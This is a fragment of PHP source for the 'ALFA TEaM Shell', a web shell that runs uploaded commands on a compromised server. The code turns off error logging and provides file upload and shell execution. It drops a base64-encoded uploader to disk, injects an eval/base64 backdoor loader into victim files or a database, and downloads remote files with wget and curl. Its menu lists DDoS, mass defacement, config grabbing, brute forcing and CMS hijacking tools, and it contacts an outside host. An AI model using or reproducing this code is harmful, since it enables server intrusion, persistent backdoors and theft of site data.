echo 'CWD: 
';

if(isset($_FILES['file'])){

if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '
Upload Successfully ;)

'; }

else{echo '
Upload failed :(


'; }

}

echo '
Execute Command: 



';

if(isset($_POST['command_solevisible'])){

if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';

$solevisible = "cd '".addslashes(str_replace("\\","/",@alfaGetCwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);

echo alfaEx($solevisible);

}

echo'


';

exit;}

@error_reporting(E_ALL ^ E_NOTICE);

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@ini_set('magic_quotes_runtime', 0);

@set_time_limit(0);

if(function_exists('set_magic_quotes_runtime')){

@set_magic_quotes_runtime(0);

}

foreach($_POST as $key => $value){

if(is_array($_POST[$key])){

$i=0;

foreach($_POST[$key] as $f) {

$f = trim(str_replace(' ', '+',$f));

$_POST[$key][$i] = decrypt_post($f);

$i++;

}

}else{

$value = trim(str_replace(' ', '+',$value));

$_POST[$key] = decrypt_post($value);

}

}

$default_action = 'FilesMan2';//'FilesMan';

$default_use_ajax = true;

$default_charset = 'Windows-1251';

if(strtolower(substr(PHP_OS,0,3))=="win")

$GLOBALS['sys']='win';

else

$GLOBALS['sys']='unix';

$GLOBALS['home_cwd'] = @alfaGetCwd();

$GLOBALS["need_to_update_header"] = "false";

$GLOBALS['glob_chdir_false'] = false;

if(isset($_POST['c'])){

if(!@chdir($_POST['c'])){

    $GLOBALS['glob_chdir_false'] = true;

}

}

$GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ?$_POST['c']:@alfaGetCwd());

if($GLOBALS['glob_chdir_false']){

    $GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd());

}

if($GLOBALS['sys'] == 'win'){

$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);

$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);

}

if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';

if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}

if(!function_exists("mb_strlen")){

    function mb_strlen($str, $c=""){

        return strlen($str);

    }

}

if(!function_exists("mb_substr")){

    function mb_substr($str, $start, $end, $c=""){

        return substr($str, $start, $end);

    }

}

define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));

function alfahead(){

$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';

$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';

define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");

if(!isset($_POST['ajax'])){

function Alfa_GetDisable_Function(){

$disfun = @ini_get('disable_functions');

$afa = 'All Functions Accessible';

if(empty($disfun))return($afa);

$s = explode(',',$disfun);

$s = array_unique($s);

$i=0;

$b=0;

$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');

$black_list = array();

$allow_list = array();

foreach($s as $d){

    $d=trim($d);

    if(empty($d)||!is_callable($d))continue;

    if(!function_exists($d)){

        if(in_array($d,$func)){

            $dis .= $d." | ";$b++;

            $black_list[] = $d;

        }else{

            $allow_list[] = $d;

        }

        $i++;

    }

}

if($i==0)return($afa);

if($i <= count($func)){

$all = array_values(array_merge($black_list, $allow_list));

return(''.implode(" | ", $all).'');

}

return(''.$dis.'Show All ('.$i.')');

}

function AlfaNum(){

$args = func_get_args();

$alfax = array();

$find = array();

for($i=1;$i<=10;$i++){

$alfax[] = $i;

}

foreach($args as $arg){

$find[] = $arg;

}

echo '';

}

if(empty($_POST['charset']))

$_POST['charset'] = $GLOBALS['default_charset'];

$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';

$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';

$totalSpace = $totalSpace?$totalSpace:1;

$on=" ON ";

$of=" OFF ";

$none=" NONE ";

if(function_exists('ssh2_connect'))

$ssh2=$on;

else

$ssh2=$of;

if(function_exists('curl_version'))

$curl=$on;

else

$curl=$of;

if(function_exists('mysql_get_client_info')||class_exists('mysqli'))

$mysql=$on;

else

$mysql=$of;

if(function_exists('mssql_connect'))

$mssql=$on;

else

$mssql=$of;

if(function_exists('pg_connect'))

$pg=$on;

else

$pg=$of;

if(function_exists('oci_connect'))

$or=$on;

else

$or=$of;

if(@ini_get('disable_functions'))

$disfun=@ini_get('disable_functions');

else

$disfun="All Functions Enable";

if(@ini_get('safe_mode'))

$safe_modes="ON";

else

$safe_modes="OFF";

$cgi_shell="OFF";

if(@ini_get('open_basedir')){

$basedir_data = @ini_get('open_basedir');

if(strlen($basedir_data)>120){

$open_b=substr($basedir_data,0, 120)."...";

}else{

$open_b = $basedir_data;

}

}else{$open_b=$none;}

if(@ini_get('safe_mode_exec_dir'))

$safe_exe=@ini_get('safe_mode_exec_dir');

else

$safe_exe=$none;

if(@ini_get('safe_mode_include_dir'))

$safe_include=@ini_get('safe_mode_include_dir');

else

$safe_include=$none;

if(!function_exists('posix_getegid'))

{

$user = function_exists("get_current_user")?@get_current_user():"????";

$uid = function_exists("getmyuid")?@getmyuid():"????";

$gid = function_exists("getmygid")?@getmygid():"????";

$group = "?";

}else{

$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");

$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");

$user = $uid['name'];

$uid = $uid['uid'];

$group = $gid['name'];

$gid = $gid['gid'];

}

$cwd_links = '';

$path = explode("/", $GLOBALS['cwd']);

$n=count($path);

for($i=0; $i<$n-1; $i++) {

$cwd_links .= "
$cach_cwd_path = "";

for($j=0; $j<=$i; $j++){

$cwd_links .= $path[$j].'/';

$cach_cwd_path .= $path[$j].'/';

}

$cwd_links .= "\")' path='".$cach_cwd_path."' href='#action=fileman&path=".$cach_cwd_path."'>".$path[$i]."/";

}

$drives = "";

foreach(range('a','z') as $drive)

if(@is_dir($drive.':\\'))

$drives .= '[ '.$drive.' ] ';

$csscode ='    -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';

echo '











..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ::..

';

echo "














";

$cmd_uname = alfaEx("uname -a",false,false);

$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');

if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}

echo '
















';

for($s=1;$s<=10;$s++){

echo '';

}

echo '




































';

if($GLOBALS['sys']=='unix'){

$useful_downloader = '';

if(!@ini_get('safe_mode')){

if(strlen(alfaEx("id",false,false))>0){

echo '



';

}else{

echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";

}

}else{

echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";

}

}else{

echo '


';

}

$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = 'ON';}else{$magic = 'OFF';}

echo '























';

if($GLOBALS['sys']=="win"){

echo '





';

}

echo '











Uname:
'.$uname.'




User:
'. $uid . ' [ ' . $user . ' ]  Group: ' . $gid . ' [ ' . $group . ' ] 
alfa team 2012




PHP:
'.@phpversion(). '  Safe Mode: '.$safe_modes.'




ServerIP:
'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' Your IP: '.@$_SERVER["REMOTE_ADDR"].'




DateTime:
'.date('Y-m-d H:i:s').'




Domains:
';

if($GLOBALS['sys']=='unix'){

$d0mains = _alfa_file("/etc/named.conf",false);

if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{

$count=0;

foreach($d0mains as $d0main){

if(@strstr($d0main,"zone")){

preg_match_all('#zone "(.*)"#', $d0main, $domains);

flush();

if(strlen(trim($domains[1][0])) > 2){

flush();

$count++;}}}

echo "$count Domains";}}

else{echo("Cant Read [ /etc/named.conf ]");}

echo '		




HDD:
Total:'.alfaSize($totalSpace).' Free:' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]

useful:--------------
Downloader: --------------
Useful : ';

$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');

$x=0;

foreach($userful as $item)if(alfaWhich($item)){$x++;echo ''.$item.'';}

if($x==0){echo "--------------";$GLOBALS["need_to_update_header"] = "true";}

echo '		




Downloader: ';

$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');

$x=0;

foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo ''.$item2.'';}

if($x==0){echo "--------------";$GLOBALS["need_to_update_header"] = "true";}

echo '		

Windows:';

echo alfaEx('ver',false,false);

echo '		

 

Downloader: -------------

Disable Functions: '.Alfa_GetDisable_Function().'
CURL :'.$curl.' | SSH2 : '.$ssh2.' | Magic Quotes : '.$magic.' |  MySQL :'.$mysql.' | MSSQL :'.$mssql.' |  PostgreSQL :'.$pg.' |  Oracle :'.$or.' '.($GLOBALS['sys']=="unix"?'|  CGI : '.$cgi_shell:"").'
Open_basedir :'.$open_b.' | Safe_mode_exec_dir :'.$safe_exe.' |  Safe_mode_include_dir :'.$safe_include.'
SoftWare: '.@getenv('SERVER_SOFTWARE').'
DRIVE:'.$drives.'
PWD:'.$cwd_links.' [ Home Shell ] 










    
';
    
$li = array('proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Database Dumper','coldumper'=>'Column Dumper','hash'=>'En-Decoder','connect'=>'BC',
    
'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
    
'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','deziper'=>'DeCompressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
    
'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher','config_grabber'=>'Config Grabber','fakepage'=>'Fake Page','archive_manager'=>'Archive Manager',
    
'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','selfrm'=>'Remove Shell'
    
);
    
foreach($li as $key=>$value){
    
echo('
  • '.$value.'
    • '."\n");
    
}
    
echo '
Alfa SettingsAbout Us'.(!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? 'LogOut':'').'
 File manager
New Tab +
';}else{

@error_reporting(E_ALL ^ E_NOTICE);

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@ini_set('magic_quotes_runtime', 0);

@set_time_limit(0);

}}

function alfalogout(){

@setcookie("AlfaUser", null, 2012);

@setcookie("AlfaPass", null, 2012);

unset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);

echo("ok");

}

function showAnimation($name){

    return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';

}

function __showicon($r){

    $s['btn']='http://solevisible.com/images/btn.png';

    $s['alfamini']='http://solevisible.com/images/alfamini.png';

    $s['loader']='http://solevisible.com/images/loader.svg';

    //return 'data:image/png;base64,'.__get_resource($s[$r]);

    return $s[$r];

}

function alfainbackdoor(){

alfahead();

echo '
| Install BackDoor |
| In File | | In DataBase | 
';

$error = 'Error In Inject BackDoor...!
File Loader is not Writable Or Not Exists...!';

$success= 'Success...!';

$textarea = "
Your Shell:
";

$select = "
Use:
 ";

$cwd = 'Example: /home/alfa/public_html/index.php';

if($_POST['alfa1']=='file'){

echo("
| In File |
{$select} 
Backdoor Loader:
  
Key: 
  {$textarea}
");

if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){

$method = $_POST['alfa2'];

$file = $_POST['alfa3'];

$shell = $_POST['alfa4'];

$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));

if($key=='')$key='alfa';

if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}

$code = '\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';

if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."
Run With: ".basename($file)."?alfa=".$key.'');}else{__alert($error);}}}

if($_POST['alfa1']=='db'){

echo("
| In DataBase |
".getConfigHtml('all')."
");

$table = array('td1' =>

array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

'td2' =>

array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

'td3' =>

array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),

'td4' =>

array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

'td5' =>

array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),

'td6' =>

array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')

);

create_table($table);

echo("
{$select}
");

echo($textarea);

echo("
");

if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){

$dbhost = $_POST['alfa2'];

$dbuser = $_POST['alfa3'];

$dbpw = $_POST['alfa4'];

$dbname = $_POST['alfa5'];

$file = $_POST['alfa6'];

$method = $_POST['alfa7'];

$shell = $_POST['alfa8'];

$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));

if($key=='')$key='alfa';

if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}

if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){

$code = '\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';

if(@is_file($file)&&@is_writable($file)){

@mysqli_query($conn,'DROP TABLE `alfa_bc`');

@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');

@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');

@file_put_contents($file,$code."\n".@file_get_contents($file));

__alert($success."
Run With: ".basename($file)."?alfa=".$key.'');}else{__alert($error);}}}}

echo('
');

alfafooter();

}

function alfawhois(){

echo("
| Whois |
>');return false;\">
Url: 
  
");

if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){

$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);

$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;

$data = @file_get_contents($target);

if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}

$target = @json_decode($data,true);

echo __pre();

if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}

echo("
");

}

function alfaremotedl(){

alfahead();

echo("
| Upload From Url |



>');return false;\">


Url: 
   



Path:
 



");

if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){

echo __pre();

$url = $_POST['alfa1'];

$path = $_POST['alfa2'];

echo('
');

if(__download($url,$path)){

echo('Success...!');

}else{

echo('Error...!');

}

echo('
');

}

echo("
");

alfafooter();

}

function __download($url,$path=false){

if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;

$saveas = basename(rawurldecode($url));

if($path){$saveas=$path.$saveas;}

if($content = __read_file($url)){

if(@is_file($saveas))@unlink($saveas);

if(__write_file($saveas, $content)){return true;}}

$buff = alfaEx("wget ".$url." -O ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("curl ".$url." -o ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("lwp-download ".$url." ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("lynx -source ".$url." > ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("GET ".$url." > ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("links -source ".$url." > ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("fetch -o ".$saveas." -p ".$url);

if(@is_file($saveas)) return true;

return false;

}

function clean_string($string){

  if(function_exists("iconv")){

      $s = trim($string);

      $s = iconv("UTF-8", "UTF-8//IGNORE", $s);

  }

  return $s;

}

function __read_file($file, $boom = true){

$content = false;

if($fh = @fopen($file, "rb")){

$content = "";

while(!feof($fh)){

$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);

}

@fclose($fh);

}

if(empty($content)||!$content){

    $content = alfaEx("cat '".addslashes($file)."'");

}

return $content;

}

function alfaMarket(){

echo "
";

$curl = new AlfaCURL();

$content = $curl->Send("http://solevisible.com/market.php");

$data = @json_decode($content, true);

if(!empty($data)){

if($data["status"] == "open"){

    echo $data["content"];

}else{

    echo $data["error_msg"];

}

}else{

    echo "
Cant connect to the alfa market....! try later.
";

}

echo "
";

}

function alfaSettings(){

alfahead();

AlfaNum(6,7,8,9,10);

echo '
| Settings |
| Generall Setting | 
';

if($_POST["alfa8"] == "main"){

echo '
| Settings |
';

$lg_array = array('0'=>'No','1'=>'Yes');

$penc_array = array('false'=>'No','true'=>'Yes');

$protect_html = "";

$icon_html = "";

$postEnc_html = "";

$login_html = "";

$cgiapi_html = "";

foreach($lg_array as $key=>$val)$protect_html .= '';

foreach($lg_array as $key=>$val)$icon_html .= '';

foreach($penc_array as $key=>$val)$cgiapi_html .= '';

foreach($penc_array as $key=>$val)$postEnc_html .= '';

$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");

foreach($lg_array as $key=>$val)$login_html .= '';

echo '';

echo '
Protect:
Cgi Api:
Post Encryption:
Show Icons:
login Page:
UserName:
Password:
';

if($_POST['alfa5']=='>>'){

echo __pre();

if(!empty($_POST['alfa3'])){

$protect = $_POST['alfa1'];

$lgpage = $_POST['alfa2'];

$username = $_POST['alfa3'];

$password = md5($_POST['alfa4']);

$icon = $_POST['alfa6'];

$post_encrypt = $_POST['alfa7'];

$cgi_api_val = $_POST['alfa9'];

@chdir($GLOBALS['home_cwd']);

$basename = @basename($_SERVER['PHP_SELF']);

$data = @file_get_contents($basename);

$user_rand = $GLOBALS["DB_NAME"]["user_rand"];

$pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];

$login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];

$safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];

$show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];

$post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];

$cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];

$find_user = '/\''.$user_rand.'\'(.*?),/i';

$find_pw = '/\''.$pass_rand.'\'(.*?),/i';

$find_lg = '/\''.$login_page_rand.'\'(.*?),/i';

$find_p = '/\''.$safemode_rand.'\'(.*?),/i';

$icons = '/\''.$show_icons_rand.'\'(.*?),/i';

$postEnc = '/\''.$post_encryption_rand.'\'(.*?),/i';

$cgi_api_reg = '/\''.$cgi_api_rand.'\'(.*?),/i';

if(!empty($username)&&preg_match($find_user,$data,$e)){

$new = '\''.$user_rand.'\' => \''.$username.'\',';

$data = str_replace($e[0],$new,$data);

}

if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){

$new = '\''.$pass_rand.'\' => \''.$password.'\',';

$data = str_replace($e[0],$new,$data);

}

if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){

$new = '\''.$login_page_rand.'\' => \''.$lgpage.'\',';

$data = str_replace($e[0],$new,$data);

}

if(!empty($find_p)&&preg_match($find_p,$data,$e)){

$new = '\''.$safemode_rand.'\' => \''.$protect.'\',';

$data = str_replace($e[0],$new,$data);

}

if(preg_match($icons,$data,$e)){

$new = '\''.$show_icons_rand.'\' => \''.$icon.'\',';

$data = str_replace($e[0],$new,$data);

}

if(preg_match($postEnc,$data,$e)){

$new = '\''.$post_encryption_rand.'\' => '.$post_encrypt.',';

$data = str_replace($e[0],$new,$data);

}

if(preg_match($cgi_api_reg,$data,$e)){

$new = '\''.$cgi_api_rand.'\' => '.$cgi_api_val.',';

$data = str_replace($e[0],$new,$data);

}

if(@file_put_contents($basename,$data)){

echo 'UserName: '.$username.'
Password: '.$_POST['alfa4'].'';

}else{

__alert("File has no edit access...!");

}

}else{

__alert("UserName is Empty !");

}

}

}elseif($_POST["alfa8"] == "color"){

echo('
| Custom Color |
');

echo '';

$template = '';

$x = 1;

foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){

    $multi = "";

    if(is_array($value)){

        if(isset($value["multi_selector"])){

            $multi = __ZW5jb2Rlcg(json_encode($value));

        }

    }

    $value = alfa_getColor($key);

    $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));

    echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);

}

echo '';
echo '
Help
{index}
{target}:
-
*
Use Default Color:



 
';

if($_POST['alfa7']=='export'){

    echo __pre();

    $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();

    $glob_colors = $GLOBALS["__ALFA_COLOR__"];

    $array = array();

    foreach($glob_colors as $k => $v){

        if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){

            $v = trim($colors[$k]);

        }else{

            $v = trim(is_array($v)?$v["key_color"]:$v);

        }

        $array[$k] = $v;

    }

    $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";

    $config = json_encode($array, JSON_PRETTY_PRINT);

    if(!@file_put_contents($file, $config)){

        echo('
Color Config:

');

    }else{

        echo('
Download Config
');

    }

}

if($_POST['alfa2']=='>>'){

    echo __pre();

    $colors = json_decode($_POST["alfa1"],true);

    $array = "";

    $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;

    $glob_colors = $GLOBALS["__ALFA_COLOR__"];

    foreach($glob_colors as $k => $v){

        if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){

            $v = trim($colors[$k]);

        }else{

            $v = trim(is_array($v)?$v["key_color"]:$v);

        }

        $array .= '"'.trim($k).'" => "'.$v.'",';

    }

    @chdir($GLOBALS['home_cwd']);

    $basename = @basename($_SERVER['PHP_SELF']);

    $data = @file_get_contents($basename);

    $color = '/\'color\'(.*?)\),/s';

    if(preg_match($color,$data,$e)){

        $new = "'color' => array(".$array."),";

        $data = str_replace($e[0],$new,$data);

        if(@file_put_contents($basename, $data)){

            echo("
[+] Success...
");

        }else{

            echo("
[-] We Not have permission to Edit shell...!
");

        }

    }else{

        echo("
[-] Error...!
");

    }

}

}

echo('
');

alfafooter();

}

function alfaaboutus(){

alfahead();

echo '
';

$news = new AlfaCURL();

$about_us = $news->Send("http://solevisible.com/aboutus.php");

if(empty($about_us)){

$about_us = "



☮ ~ PEACE ~ ☮


Shell Coded By Sole Sad & Invisible (ALFA TEaM)


Contact : solevisible@gmail.com


Telegram Channel: @solevisible


Skype : ehsan.invisible


Skype : sole.sad


Persian Gulf For Ever


Iranian Programmers


############



";

}

echo __pre().$about_us;

echo('
');

alfafooter();

}

function alfacoldumper(){

alfahead();

echo('
');

AlfaNum(8,9,10);

echo "

| Mysql Column Dumper |


".getConfigHtml('all')."
";

$delimiter = (!empty($_POST['alfa1']) ? $_POST['alfa1'] : '::');

$selected_data = json_decode($_POST['alfa2'], true);

$username = ($_POST['alfa3']);

$password = ($_POST['alfa4']);

$dbname = ($_POST['alfa5']);

$dfile = ($_POST['alfa6']);

$host = ($_POST['alfa7']);

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'),

 'td5' =>

